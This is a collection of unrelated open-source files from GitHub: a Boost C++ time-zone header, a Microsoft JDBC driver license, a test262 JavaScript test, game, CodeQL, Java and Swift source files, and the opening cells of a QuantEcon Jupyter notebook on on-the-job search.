date_time::base_time<utc_time_type,time_system_type>(utc_time_type(d,td)),
zone_(tz)
{
time_is_dst_result result = check_dst(d, td, tz);
if(result == ambiguous) {
if(calc_option == EXCEPTION_ON_ERROR){
std::ostringstream ss;
ss << "time given: " << d << ' ' << td;
boost::throw_exception(ambiguous_result(ss.str()));
}
else{ // NADT on error
this->time_ = posix_time::posix_time_system::get_time_rep(date_type(date_time::not_a_date_time), time_duration_type(date_time::not_a_date_time));
}
}
else if(result == invalid_time_label){
if(calc_option == EXCEPTION_ON_ERROR){
std::ostringstream ss;
ss << "time given: " << d << ' ' << td;
boost::throw_exception(time_label_invalid(ss.str()));
}
else{ // NADT on error
this->time_ = posix_time::posix_time_system::get_time_rep(date_type(date_time::not_a_date_time), time_duration_type(date_time::not_a_date_time));
}
}
else if(result == is_in_dst){
utc_time_type t =
construction_adjustment(utc_time_type(d, td), tz, true);
this->time_ = posix_time::posix_time_system::get_time_rep(t.date(),
t.time_of_day());
}
else{
utc_time_type t =
construction_adjustment(utc_time_type(d, td), tz, false);
this->time_ = posix_time::posix_time_system::get_time_rep(t.date(),
t.time_of_day());
}
}
//! Determines if given time label is in daylight savings for given zone
/*! Determines if given time label is in daylight savings for given zone.
* Takes a date and time_duration representing a local time, along
* with time zone, and returns a time_is_dst_result object as result.
*/
static time_is_dst_result check_dst(date_type d,
time_duration_type td,
boost::shared_ptr<tz_type> tz)
{
if(tz != boost::shared_ptr<tz_type>() && tz->has_dst()) {
typedef typename date_time::dst_calculator<date_type, time_duration_type> dst_calculator;
return dst_calculator::local_is_dst(
d, td,
tz->dst_local_start_time(d.year()).date(),
tz->dst_local_start_time(d.year()).time_of_day(),
tz->dst_local_end_time(d.year()).date(),
tz->dst_local_end_time(d.year()).time_of_day(),
tz->dst_offset()
);
}
else{
return is_not_in_dst;
}
}
//! Simple destructor, releases time zone if last referrer
~local_date_time_base() {}
//! Copy constructor
local_date_time_base(const local_date_time_base& rhs) :
date_time::base_time<utc_time_type, time_system_type>(rhs),
zone_(rhs.zone_)
{}
//! Special values constructor
explicit local_date_time_base(const boost::date_time::special_values sv,
boost::shared_ptr<tz_type> tz = boost::shared_ptr<tz_type>()) :
date_time::base_time<utc_time_type, time_system_type>(utc_time_type(sv)),
zone_(tz)
{}
//! returns time zone associated with calling instance
boost::shared_ptr<tz_type> zone() const
{
return zone_;
}
//! returns false is time_zone is NULL and if time value is a special_value
bool is_dst() const
{
if(zone_ != boost::shared_ptr<tz_type>() && zone_->has_dst() && !this->is_special()) {
// check_dst takes a local time, *this is utc
utc_time_type lt(this->time_);
lt += zone_->base_utc_offset();
// dst_offset only needs to be considered with ambiguous time labels
// make that adjustment there
switch(check_dst(lt.date(), lt.time_of_day(), zone_)){
case is_not_in_dst:
return false;
case is_in_dst:
return true;
case ambiguous:
if(lt + zone_->dst_offset() < zone_->dst_local_end_time(lt.date().year())) {
return true;
}
break;
case invalid_time_label:
if(lt >= zone_->dst_local_start_time(lt.date().year())) {
return true;
}
break;
}
}
return false;
}
//! Returns object's time value as a utc representation
utc_time_type utc_time() const
{
return utc_time_type(this->time_);
}
//! Returns object's time value as a local representation
utc_time_type local_time() const
{
if(zone_ != boost::shared_ptr<tz_type>()){
utc_time_type lt = this->utc_time() + zone_->base_utc_offset();
if (is_dst()) {
lt += zone_->dst_offset();
}
return lt;
}
return utc_time_type(this->time_);
}
//! Returns string in the form "2003-Aug-20 05:00:00 EDT"
/*! Returns string in the form "2003-Aug-20 05:00:00 EDT". If
* time_zone is NULL the time zone abbreviation will be "UTC". The time
* zone abbrev will not be included if calling object is a special_value*/
std::string to_string() const
{
//TODO is this a temporary function ???
std::ostringstream ss;
if(this->is_special()){
ss << utc_time();
return ss.str();
}
if(zone_ == boost::shared_ptr<tz_type>()) {
ss << utc_time() << " UTC";
return ss.str();
}
bool is_dst_ = is_dst();
utc_time_type lt = this->utc_time() + zone_->base_utc_offset();
if (is_dst_) {
lt += zone_->dst_offset();
}
ss << local_time() << " ";
if (is_dst()) {
ss << zone_->dst_zone_abbrev();
}
else {
ss << zone_->std_zone_abbrev();
}
return ss.str();
}
/*! returns a local_date_time_base in the given time zone with the
* optional time_duration added. */
local_date_time_base local_time_in(boost::shared_ptr<tz_type> new_tz,
time_duration_type td=time_duration_type(0,0,0)) const
{
return local_date_time_base(utc_time_type(this->time_) + td, new_tz);
}
//! Returns name of associated time zone or "Coordinated Universal Time".
/*! Optional bool parameter will return time zone as an offset
* (ie "+07:00" extended iso format). Empty string is returned for
* classes that do not use a time_zone */
std::string zone_name(bool as_offset=false) const
{
if(zone_ == boost::shared_ptr<tz_type>()) {
if(as_offset) {
return std::string("Z");
}
else {
return std::string("Coordinated Universal Time");
}
}
if (is_dst()) {
if(as_offset) {
time_duration_type td = zone_->base_utc_offset();
td += zone_->dst_offset();
return zone_as_offset(td, ":");
}
else {
return zone_->dst_zone_name();
}
}
else {
if(as_offset) {
time_duration_type td = zone_->base_utc_offset();
return zone_as_offset(td, ":");
}
else {
return zone_->std_zone_name();
}
}
}
//! Returns abbreviation of associated time zone or "UTC".
/*! Optional bool parameter will return time zone as an offset
* (ie "+0700" iso format). Empty string is returned for classes
* that do not use a time_zone */
std::string zone_abbrev(bool as_offset=false) const
{
if(zone_ == boost::shared_ptr<tz_type>()) {
if(as_offset) {
return std::string("Z");
}
else {
return std::string("UTC");
}
}
if (is_dst()) {
if(as_offset) {
time_duration_type td = zone_->base_utc_offset();
td += zone_->dst_offset();
return zone_as_offset(td, "");
}
else {
return zone_->dst_zone_abbrev();
}
}
else {
if(as_offset) {
time_duration_type td = zone_->base_utc_offset();
return zone_as_offset(td, "");
}
else {
return zone_->std_zone_abbrev();
}
}
}
//! returns a posix_time_zone string for the associated time_zone. If no time_zone, "UTC+00" is returned.
std::string zone_as_posix_string() const
{
if(zone_ == shared_ptr<tz_type>()) {
return std::string("UTC+00");
}
return zone_->to_posix_string();
}
//! Equality comparison operator
/*bool operator==(const date_time::base_time<boost::posix_time::ptime,boost::posix_time::posix_time_system>& rhs) const
{ // fails due to rhs.time_ being protected
return date_time::base_time<boost::posix_time::ptime,boost::posix_time::posix_time_system>::operator==(rhs);
//return this->time_ == rhs.time_;
}*/
//! Equality comparison operator
bool operator==(const local_date_time_base& rhs) const
{
return time_system_type::is_equal(this->time_, rhs.time_);
}
//! Non-Equality comparison operator
bool operator!=(const local_date_time_base& rhs) const
{
return !(*this == rhs);
}
//! Less than comparison operator
bool operator<(const local_date_time_base& rhs) const
{
return time_system_type::is_less(this->time_, rhs.time_);
}
//! Less than or equal to comparison operator
bool operator<=(const local_date_time_base& rhs) const
{
return (*this < rhs || *this == rhs);
}
//! Greater than comparison operator
bool operator>(const local_date_time_base& rhs) const
{
return !(*this <= rhs);
}
//! Greater than or equal to comparison operator
bool operator>=(const local_date_time_base& rhs) const
{
return (*this > rhs || *this == rhs);
}
//! Local_date_time + date_duration
local_date_time_base operator+(const date_duration_type& dd) const
{
return local_date_time_base(time_system_type::add_days(this->time_,dd), zone_);
}
//! Local_date_time += date_duration
local_date_time_base operator+=(const date_duration_type& dd)
{
this->time_ = time_system_type::add_days(this->time_,dd);
return *this;
}
//! Local_date_time - date_duration
local_date_time_base operator-(const date_duration_type& dd) const
{
return local_date_time_base(time_system_type::subtract_days(this->time_,dd), zone_);
}
//! Local_date_time -= date_duration
local_date_time_base operator-=(const date_duration_type& dd)
{
this->time_ = time_system_type::subtract_days(this->time_,dd);
return *this;
}
//! Local_date_time + time_duration
local_date_time_base operator+(const time_duration_type& td) const
{
return local_date_time_base(time_system_type::add_time_duration(this->time_,td), zone_);
}
//! Local_date_time += time_duration
local_date_time_base operator+=(const time_duration_type& td)
{
this->time_ = time_system_type::add_time_duration(this->time_,td);
return *this;
}
//! Local_date_time - time_duration
local_date_time_base operator-(const time_duration_type& td) const
{
return local_date_time_base(time_system_type::subtract_time_duration(this->time_,td), zone_);
}
//! Local_date_time -= time_duration
local_date_time_base operator-=(const time_duration_type& td)
{
this->time_ = time_system_type::subtract_time_duration(this->time_,td);
return *this;
}
//! local_date_time -= local_date_time --> time_duration_type
time_duration_type operator-(const local_date_time_base& rhs) const
{
return utc_time_type(this->time_) - utc_time_type(rhs.time_);
}
private:
boost::shared_ptr<tz_type> zone_;
//bool is_dst_;
/*! Adjust the passed in time to UTC?
*/
utc_time_type construction_adjustment(utc_time_type t,
boost::shared_ptr<tz_type> z,
bool dst_flag)
{
if(z != boost::shared_ptr<tz_type>()) {
if(dst_flag && z->has_dst()) {
t -= z->dst_offset();
} // else no adjust
t -= z->base_utc_offset();
}
return t;
}
/*! Simple formatting code -- todo remove this?
*/
std::string zone_as_offset(const time_duration_type& td,
const std::string& separator) const
{
std::ostringstream ss;
if(td.is_negative()) {
// a negative duration is represented as "-[h]h:mm"
// we require two digits for the hour. A positive duration
// with the %H flag will always give two digits
ss << "-";
}
else {
ss << "+";
}
ss << std::setw(2) << std::setfill('0')
<< date_time::absolute_value(td.hours())
<< separator
<< std::setw(2) << std::setfill('0')
<< date_time::absolute_value(td.minutes());
return ss.str();
}
};
//!Use the default parameters to define local_date_time
typedef local_date_time_base<> local_date_time;
} }
#endif
| {
"pile_set_name": "Github"
} |
MICROSOFT SOFTWARE LICENSE TERMS
MICROSOFT SQL SERVER 2005 JDBC DRIVER
January 2006
These license terms are an agreement between Microsoft Corporation (or based on where you live, one of its affiliates) and you. Please read them. They apply to the software named above, which includes the media on which you received it, if any. The terms also apply to any Microsoft
· updates,
· supplements,
· Internet-based services, and
· support services
for this software, unless other terms accompany those items. If so, those terms apply.
By using the software, you accept these terms. If you do not accept them, do not use the software.
If you comply with these license terms, you have the rights below.
1. INSTALLATION AND USE RIGHTS. You may install and use any number of copies of the software on your devices.
2. SCOPE OF LICENSE. The software is licensed, not sold. This agreement only gives you some rights to use the software. Microsoft reserves all other rights. Unless applicable law gives you more rights despite this limitation, you may use the software only as expressly permitted in this agreement. In doing so, you must comply with any technical limitations in the software that only allow you to use it in certain ways. You may not
· disclose the results of any benchmark tests of the software to any third party without Microsoft’s prior written approval;
· reverse engineer, decompile or disassemble the software, except and only to the extent that applicable law expressly permits, despite this limitation;
· publish the software for others to copy; or
· rent, lease or lend the software.
3. TRANSFER TO A THIRD PARTY. The first user of the software may transfer it and this agreement directly to a third party. Before the transfer, that party must agree that this agreement applies to the transfer and use of the software. The first user must uninstall the software before transferring it separately from the device. The first user may not retain any copies.
4. EXPORT RESTRICTIONS. The software is subject to United States export laws and regulations. You must comply with all domestic and international export laws and regulations that apply to the software. These laws include restrictions on destinations, end users and end use. For additional information, see www.microsoft.com/exporting.
5. SUPPORT SERVICES. Because this software is “as is,” we may not provide support services for it.
6. ENTIRE AGREEMENT. This agreement, and the terms for supplements, updates, Internet-based services and support services that you use, are the entire agreement for the software and support services.
7. APPLICABLE LAW.
a. United States. If you acquired the software in the United States, Washington state law governs the interpretation of this agreement and applies to claims for breach of it, regardless of conflict of laws principles. The laws of the state where you live govern all other claims, including claims under state consumer protection laws, unfair competition laws, and in tort.
b. Outside the United States. If you acquired the software in any other country, the laws of that country apply.
8. LEGAL EFFECT. This agreement describes certain legal rights. You may have other rights under the laws of your country. You may also have rights with respect to the party from whom you acquired the software. This agreement does not change your rights under the laws of your country if the laws of your country do not permit it to do so.
9. DISCLAIMER OF WARRANTY. The software is licensed “as-is.” You bear the risk of using it. Microsoft gives no express warranties, guarantees or conditions. You may have additional consumer rights under your local laws which this agreement cannot change. To the extent permitted under your local laws, Microsoft excludes the implied warranties of merchantability, fitness for a particular purpose and non-infringement.
10. LIMITATION ON AND EXCLUSION OF REMEDIES AND DAMAGES. You can recover from Microsoft and its suppliers only direct damages up to U.S. $5.00. You cannot recover any other damages, including consequential, lost profits, special, indirect or incidental damages.
This limitation applies to
· anything related to the software, services, content (including code) on third party Internet sites, or third party programs; and
· claims for breach of contract, breach of warranty, guarantee or condition, strict liability, negligence, or other tort to the extent permitted by applicable law.
It also applies even if Microsoft knew or should have known about the possibility of the damages. The above limitation or exclusion may not apply to you because your country may not allow the exclusion or limitation of incidental, consequential or other damages.
Please note: As this software is distributed in Quebec, Canada, some of the clauses in this agreement are provided below in French.
Remarque: Ce logiciel étant distribué au Québec, Canada, certaines des clauses dans ce contrat sont fournies ci-dessous en français.
EXONÉRATION DE GARANTIE. Le logiciel visé par une licence est offert « tel quel ». Toute utilisation de ce logiciel est à votre seule risque et péril. Microsoft n’accorde aucune autre garantie expresse. Vous pouvez bénéficier de droits additionnels en vertu du droit local sur la protection dues consommateurs, que ce contrat ne peut modifier. La ou elles sont permises par le droit locale, les garanties implicites de qualité marchande, d’adéquation à un usage particulier et d’absence de contrefaçon sont exclues.
LIMITATION DES DOMMAGES-INTÉRÊTS ET EXCLUSION DE RESPONSABILITÉ POUR LES DOMMAGES. Vous pouvez obtenir de Microsoft et de ses fournisseurs une indemnisation en cas de dommages directs uniquement à hauteur de 5,00 $ US. Vous ne pouvez prétendre à aucune indemnisation pour les autres dommages, y compris les dommages spéciaux, indirects ou accessoires et pertes de bénéfices.
Cette limitation concerne:
· tout ce qui est relié au logiciel, aux services ou au contenu (y compris le code) figurant sur des sites Internet tiers ou dans des programmes tiers ; et
· les réclamations au titre de violation de contrat ou de garantie, ou au titre de responsabilité stricte, de négligence ou d’une autre faute dans la limite autorisée par la loi en vigueur.
Elle s’applique également, même si Microsoft connaissait ou devrait connaître l’éventualité d’un tel dommage. Si votre pays n’autorise pas l’exclusion ou la limitation de responsabilité pour les dommages indirects, accessoires ou de quelque nature que ce soit, il se peut que la limitation ou l’exclusion ci-dessus ne s’appliquera pas à votre égard.
EFFET JURIDIQUE. Le présent contrat décrit certains droits juridiques. Vous pourriez avoir d’autres droits prévus par les lois de votre pays. Le présent contrat ne modifie pas les droits que vous confèrent les lois de votre pays si celles-ci ne le permettent pas.
| {
"pile_set_name": "Github"
} |
/// Copyright (c) 2012 Ecma International. All rights reserved.
/// Ecma International makes this code available under the terms and conditions set
/// forth on http://hg.ecmascript.org/tests/test262/raw-file/tip/LICENSE (the
/// "Use Terms"). Any redistribution of this code must retain the above
/// copyright and this notice and otherwise comply with the Use Terms.
/**
* @path ch15/15.4/15.4.4/15.4.4.19/15.4.4.19-3-4.js
* @description Array.prototype.map - value of 'length' is a number (value is +0)
*/
function testcase() {
function callbackfn(val, idx, obj) {
return val > 10;
}
var obj = { 0: 11, length: +0 };
var newArr = Array.prototype.map.call(obj, callbackfn);
return newArr.length === 0;
}
runTestCase(testcase);
| {
"pile_set_name": "Github"
} |
//
// Represents an update operation that replaces the value of one property
// with another.
//
// Copyright (c) The Dojo Foundation 2011. All Rights Reserved.
// Copyright (c) IBM Corporation 2008, 2011. All Rights Reserved.
//
/*jslint white:false, bitwise:true, eqeqeq:true, immed:true, nomen:false,
onevar:false, plusplus:false, undef:true, browser:true, devel:true,
forin:false, sub:false*/
/*global define*/
define([
'coweb/jsoe/Operation',
'coweb/jsoe/factory'
], function(Operation, factory) {
/**
* @constructor
*/
var UpdateOperation = function(args) {
this.type = 'update';
Operation.call(this, args);
};
UpdateOperation.prototype = new Operation();
UpdateOperation.prototype.constructor = UpdateOperation;
factory.registerOperationForType('update', UpdateOperation);
/**
* Gets the method name to use to transform another operation against this
* update operation.
*
* @return {String} Method name
*/
UpdateOperation.prototype.transformMethod = function() {
return 'transformWithUpdate';
};
/**
* Transforms this update to include the effect of an update.
*
* @param {UpdateOperation} op Update to include in this op
* @returns {UpdateOperation} This instance
*/
UpdateOperation.prototype.transformWithUpdate = function(op) {
if((op.position !== this.position) || (op.key !== this.key)) {
return this;
}
if(this.siteId > op.siteId) {
this.value = op.value;
} else if((this.siteId === op.siteId) && (this.seqId < op.seqId)) {
this.value = op.value;
}
return this;
};
/**
* Transforms this update to include the effect of an insert.
*
* @param {InsertOperation} op Insert to include in this op
* @returns {UpdateOperation} This instance
*/
UpdateOperation.prototype.transformWithInsert = function(op) {
if(this.key !== op.key) {
return this;
}
if(this.position >= op.position) {
++this.position;
}
return this;
};
/**
* Transforms this update to include the effect of a delete.
*
* @param {DeleteOperation} op Delete to include in this op
* @returns {UpdateOperation} This instance
*/
UpdateOperation.prototype.transformWithDelete = function(op) {
if(this.key !== op.key) {
return this;
}
if(this.position > op.position) {
--this.position;
} else if(this.position === op.position) {
return null;
}
return this;
};
return UpdateOperation;
});
| {
"pile_set_name": "Github"
} |
/mob/living/simple_animal/hostile/retaliate
var/list/enemies = list()
/mob/living/simple_animal/hostile/retaliate/ListTargets(var/dist = world.view)
. = list()
if(!enemies.len)
return
var/possible_targets = ..()
for(var/weakref/W in enemies)
var/mob/M = W.resolve()
if(M in possible_targets)
. += M
/mob/living/simple_animal/hostile/retaliate/proc/AddEnemies(var/list/possible_enemies)
for(var/mob/M in possible_enemies)
if(ValidTarget(M))
enemies |= weakref(M)
/mob/living/simple_animal/hostile/retaliate/proc/FindAllies(var/list/possible_allies)
for(var/mob/living/simple_animal/hostile/retaliate/H in possible_allies)
if(!attack_same && !H.attack_same && H.faction == faction)
H.enemies |= enemies
/mob/living/simple_animal/hostile/retaliate/proc/Retaliate(var/dist = world.view)
var/list/possible_targets_or_allies = hearers(usr, dist)
AddEnemies(possible_targets_or_allies)
FindAllies(possible_targets_or_allies)
/mob/living/simple_animal/hostile/retaliate/adjustBruteLoss(var/damage)
..(damage)
Retaliate(10)
| {
"pile_set_name": "Github"
} |
license bsd2;
project "window"
{
depend "base";
depend "util";
depend "gui";
config "debug_dx9_win32";
config "optim_dx9_win32";
config "debug_dx11_win32";
config "optim_dx11_win32";
config "debug_gl2_win32";
config "optim_gl2_win32";
config "debug_gl2_linux";
config "optim_gl2_linux";
config "debug_gles2_ios";
config "optim_gles2_ios";
file "main.cpp";
file "main.hpp";
file "mp.txt";
}
| {
"pile_set_name": "Github"
} |
/** Provides classes for working with locations and program elements that have locations. */
import go
/**
* A location as given by a file, a start line, a start column,
* an end line, and an end column.
*
* For more information about locations see [LGTM locations](https://lgtm.com/help/ql/locations).
*/
class Location extends @location {
/** Gets the file for this location. */
File getFile() { locations_default(this, result, _, _, _, _) }
/** Gets the 1-based line number (inclusive) where this location starts. */
int getStartLine() { locations_default(this, _, result, _, _, _) }
/** Gets the 1-based column number (inclusive) where this location starts. */
int getStartColumn() { locations_default(this, _, _, result, _, _) }
/** Gets the 1-based line number (inclusive) where this location ends. */
int getEndLine() { locations_default(this, _, _, _, result, _) }
/** Gets the 1-based column number (inclusive) where this location ends. */
int getEndColumn() { locations_default(this, _, _, _, _, result) }
/** Gets the number of lines covered by this location. */
int getNumLines() { result = getEndLine() - getStartLine() + 1 }
/** Gets a textual representation of this element. */
string toString() {
exists(string filepath, int startline, int startcolumn, int endline, int endcolumn |
hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) and
result = filepath + "@" + startline + ":" + startcolumn + ":" + endline + ":" + endcolumn
)
}
/**
* Holds if this element is at the specified location.
* The location spans column `startcolumn` of line `startline` to
* column `endcolumn` of line `endline` in file `filepath`.
* For more information, see
* [LGTM locations](https://lgtm.com/help/ql/locations).
*/
predicate hasLocationInfo(
string filepath, int startline, int startcolumn, int endline, int endcolumn
) {
exists(File f |
locations_default(this, f, startline, startcolumn, endline, endcolumn) and
filepath = f.getAbsolutePath()
)
}
}
/** A program element with a location. */
class Locatable extends @locatable {
/** Gets the file this program element comes from. */
File getFile() { result = getLocation().getFile() }
/** Gets this element's location. */
Location getLocation() { has_location(this, result) }
/** Gets the number of lines covered by this element. */
int getNumLines() { result = getLocation().getNumLines() }
/**
* Holds if this element is at the specified location.
* The location spans column `startcolumn` of line `startline` to
* column `endcolumn` of line `endline` in file `filepath`.
* For more information, see
* [LGTM locations](https://lgtm.com/help/ql/locations).
*/
predicate hasLocationInfo(
string filepath, int startline, int startcolumn, int endline, int endcolumn
) {
getLocation().hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn)
}
/** Gets a textual representation of this element. */
string toString() { result = "locatable element" }
}
| {
"pile_set_name": "Github"
} |
/*
* To change this template, choose Tools | Templates and open the template in the editor.
*/
package view.acting;
import geometry.geom3d.Point3D;
import geometry.math.AngleUtil;
import java.awt.Color;
import java.util.logging.Logger;
import model.battlefield.abstractComps.FieldComp;
import model.battlefield.actors.Actor;
import model.battlefield.actors.ModelActor;
import model.battlefield.army.components.Projectile;
import model.battlefield.army.components.Turret;
import model.battlefield.army.components.Unit;
import model.battlefield.map.Trinket;
import view.mapDrawing.MapDrawer;
import view.material.MaterialManager;
import view.math.TranslateUtil;
import view.mesh.Circle;
import com.jme3.animation.AnimControl;
import com.jme3.animation.Bone;
import com.jme3.animation.Skeleton;
import com.jme3.math.Quaternion;
import com.jme3.math.Vector3f;
import com.jme3.renderer.queue.RenderQueue;
import com.jme3.scene.Geometry;
import com.jme3.scene.Node;
import com.jme3.scene.Spatial;
/**
* @author Benoît
*/
public class ModelPerformer extends Performer {
private static final Logger logger = Logger.getLogger(MapDrawer.class.getName());
public static final String ENTITYID_USERDATA = "entityid";
public ModelPerformer(ActorDrawer bs) {
super(bs);
}
@Override
public void perform(Actor a) {
ModelActor actor = (ModelActor) a;
if (actor.getViewElements().spatial == null) {
Spatial s = actorDrawer.buildSpatial(actor);
actor.getViewElements().spatial = s;
// We force update here because we need imediatly to have access to bones' absolute position.
AnimControl animControl = s.getControl(AnimControl.class);
if (animControl != null) {
animControl.update(0);
} else if(actor.getComp() instanceof Unit &&
!((Unit)actor.getComp()).getTurrets().isEmpty()) {
throw new RuntimeException("The unit "+actor.getComp()+" attached to actor "+actor+" have one or more turret, but no AnimControl.");
}
}
if (actor.getComp() != null) {
drawAsComp(actor);
}
}
protected void drawAsComp(ModelActor actor) {
Spatial s = actor.getViewElements().spatial;
FieldComp comp = actor.getComp();
// save the unitid in the userdata
// TODO, may be set once in the spatial creation
s.setUserData(ENTITYID_USERDATA, comp.getId());
// translation
s.setLocalTranslation(TranslateUtil.toVector3f(actor.getPos()));
// rotation
Quaternion r = new Quaternion();
if (comp.getDirection() != null) {
Point3D pu = comp.getUpDirection();
Point3D pv = comp.getDirection();
if (pu != null) {
// the comp has an up vector
// for ground comps or horizontally flying units
Vector3f u = TranslateUtil.toVector3f(pu).normalize();
Vector3f v = TranslateUtil.toVector3f(pv).normalize();
r.lookAt(v, u);
// we correct the pitch of the unit because the direction is always flatten
// this is only to follow the terrain relief
double angle = Math.acos(pu.getDotProduct(pv) / (pu.getNorm() * pv.getNorm()));
r = r.mult(new Quaternion().fromAngles((float) (-angle+AngleUtil.RIGHT+actor.getPitchFix()), (float) (actor.getRollFix()), (float) (actor.getYawFix())));
} else {
// the comp hasn't any up vector
// for projectiles
Vector3f u = new Vector3f(0, -1, 0);
Vector3f v = TranslateUtil.toVector3f(pv).normalize();
float real = 1 + u.dot(v);
Vector3f w = u.cross(v);
r = new Quaternion(w.x, w.y, w.z, real).normalizeLocal();
}
}
s.setLocalRotation(r);
if (actor.getComp() instanceof Unit) {
drawAsUnit(actor);
} else if (actor.getComp() instanceof Projectile) {
drawAsProjectile(actor);
} else if (actor.getComp() instanceof Trinket) {
drawAsTrinket(actor);
}
}
protected void drawAsUnit(ModelActor actor) {
orientTurret(actor);
updateBoneCoords(actor);
drawSelectionCircle(actor);
}
protected void drawAsProjectile(ModelActor actor) {
updateBoneCoords(actor);
}
protected void drawAsTrinket(ModelActor actor) {
}
private void drawSelectionCircle(ModelActor actor) {
Unit unit = (Unit) actor.getComp();
if (actor.getViewElements().selectionCircle == null) {
Geometry g = new Geometry();
g.setMesh(new Circle((float) unit.getRadius(), 10));
g.setMaterial(MaterialManager.greenMaterial);
g.rotate((float) AngleUtil.RIGHT, 0, 0);
Node n = new Node();
n.attachChild(g);
actor.getViewElements().selectionCircle = n;
}
Node n = actor.getViewElements().selectionCircle;
n.setLocalTranslation(TranslateUtil.toVector3f(actor.getPos().getAddition(0, 0, 0.2)));
if (unit.selected) {
if (!actorDrawer.mainNode.hasChild(n)) {
actorDrawer.mainNode.attachChild(n);
}
} else if (actorDrawer.mainNode.hasChild(n)) {
actorDrawer.mainNode.detachChild(n);
}
}
private void orientTurret(ModelActor actor) {
for (Turret t : ((Unit) actor.getComp()).getTurrets()) {
Bone turretBone = actor.getViewElements().spatial.getControl(AnimControl.class).getSkeleton().getBone(t.boneName);
if (turretBone == null) {
throw new RuntimeException("Can't find the bone " + t.boneName + " for turret.");
}
// Vector3f axis;
// switch (t.boneAxis){
// case "X" : axis = Vector3f.UNIT_X; break;
// case "Y" : axis = Vector3f.UNIT_Y; break;
// case "Z" : axis = Vector3f.UNIT_Z; break;
// default : throw new IllegalArgumentException("Wrong bone axis for "+((Unit)actor.getComp()).builderID+" : "+t.boneAxis);
// }
// Quaternion r = new Quaternion().fromAngleAxis((float) t.yaw, axis);
Quaternion r = new Quaternion().fromAngleAxis((float) t.yaw, Vector3f.UNIT_Y);
turretBone.setUserControl(true);
turretBone.setUserTransforms(Vector3f.ZERO, r, Vector3f.UNIT_XYZ);
}
}
private void updateBoneCoords(ModelActor actor) {
AnimControl ctrl = actor.getViewElements().spatial.getControl(AnimControl.class);
if(ctrl == null) {
return;
}
Skeleton sk = ctrl.getSkeleton();
for (int i = 0; i < sk.getBoneCount(); i++) {
Bone b = sk.getBone(i);
actor.setBone(b.getName(), getBoneWorldPos(actor, i));
}
}
private Point3D getBoneWorldPos(ModelActor actor, String boneName) {
return getBoneWorldPos(actor, actor.getPos(), actor.getYaw(), boneName);
}
private Point3D getBoneWorldPos(ModelActor actor, int boneIndex) {
return getBoneWorldPos(actor, actor.getViewElements().spatial.getControl(AnimControl.class).getSkeleton().getBone(boneIndex).getName());
}
private Point3D getBoneWorldPos(ModelActor actor, Point3D actorPos, double actorYaw, String boneName) {
Spatial s = actor.getViewElements().spatial;
Vector3f modelSpacePos = s.getControl(AnimControl.class).getSkeleton().getBone(boneName).getModelSpacePosition();
Quaternion q = actor.getViewElements().spatial.getLocalRotation();
modelSpacePos = q.mult(modelSpacePos);
modelSpacePos.multLocal(s.getLocalScale());
modelSpacePos = modelSpacePos.add(s.getLocalTranslation());
// float scale
// Point2D p2D = Translator.toPoint2D(modelSpacePos);
// p2D = p2D.getRotation(actorYaw+Angle.RIGHT);
// Point3D p3D = new Point3D(p2D.getMult(DEFAULT_SCALE), modelSpacePos.z*DEFAULT_SCALE, 1);
// p3D = p3D.getAddition(actorPos);
// return p3D;
return TranslateUtil.toPoint3D(modelSpacePos);
}
}
| {
"pile_set_name": "Github"
} |
package com.gxk.jvm.classfile;
public class Attributes {
public final Attribute[] attributes;
public Attributes(int size) {
this.attributes = new Attribute[size];
}
}
| {
"pile_set_name": "Github"
} |
import Foundation
public final class UserDefaultsPurchaseStorage : PurchaseStorage {
private let defaults: UserDefaults
public init(defaults: UserDefaults = .standard) {
self.defaults = defaults
}
private let storageKeyPrefix: String = "purchaseStorage"
public func record(forProductIdentifier productIdentifier: String) -> PurchaseRecord? {
let storageKey = self.storageKey(forProductIdentifier: productIdentifier)
guard let dict = self.defaults.dictionary(forKey: storageKey) else { return nil }
return PurchaseRecord(from: dict)
}
public func save(_ record: PurchaseRecord) -> PurchaseStorageUpdateResult {
let previousRecord = self.record(forProductIdentifier: record.productIdentifier)
guard record != previousRecord else {
return .noChanges
}
let key = self.storageKey(forProductIdentifier: record.productIdentifier)
let dict = record.dictionaryRepresentation
self.defaults.set(dict, forKey: key)
return .didChangeRecords
}
public func removeRecord(forProductIdentifier productIdentifier: String) -> PurchaseStorageUpdateResult {
let key = self.storageKey(forProductIdentifier: productIdentifier)
if self.defaults.object(forKey: key) != nil {
self.defaults.set(nil, forKey: key)
return .didChangeRecords
}
return .noChanges
}
private func storageKey(forProductIdentifier productIdentifier: String) -> String {
return self.storageKeyPrefix + "." + productIdentifier
}
}
| {
"pile_set_name": "Github"
} |
{
"cells": [
{
"cell_type": "markdown",
"metadata": {},
"source": [
"\n",
"<a id='jv'></a>\n",
"<div id=\"qe-notebook-header\" align=\"right\" style=\"text-align:right;\">\n",
" <a href=\"https://quantecon.org/\" title=\"quantecon.org\">\n",
" <img style=\"width:250px;display:inline;\" width=\"250px\" src=\"https://assets.quantecon.org/img/qe-menubar-logo.svg\" alt=\"QuantEcon\">\n",
" </a>\n",
"</div>"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"# Job Search VII: On-the-Job Search\n",
"\n",
"\n",
"<a id='index-1'></a>"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Contents\n",
"\n",
"- [Job Search VII: On-the-Job Search](#Job-Search-VII:-On-the-Job-Search) \n",
" - [Overview](#Overview) \n",
" - [Model](#Model) \n",
" - [Implementation](#Implementation) \n",
" - [Solving for Policies](#Solving-for-Policies) \n",
" - [Exercises](#Exercises) \n",
" - [Solutions](#Solutions) "
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"In addition to what’s in Anaconda, this lecture will need the following libraries:"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"hide-output": true
},
"outputs": [],
"source": [
"!pip install --upgrade quantecon\n",
"!pip install interpolation"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Overview\n",
"\n",
"In this section, we solve a simple on-the-job search model\n",
"\n",
"- based on [[LS18]](https://python.quantecon.org/zreferences.html#ljungqvist2012), exercise 6.18, and [[Jov79]](https://python.quantecon.org/zreferences.html#jovanovic1979) \n",
"\n",
"\n",
"Let’s start with some imports:"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"hide-output": false
},
"outputs": [],
"source": [
"import numpy as np\n",
"import scipy.stats as stats\n",
"from interpolation import interp\n",
"from numba import njit, prange\n",
"import matplotlib.pyplot as plt\n",
"%matplotlib inline\n",
"from math import gamma"
]
},
{
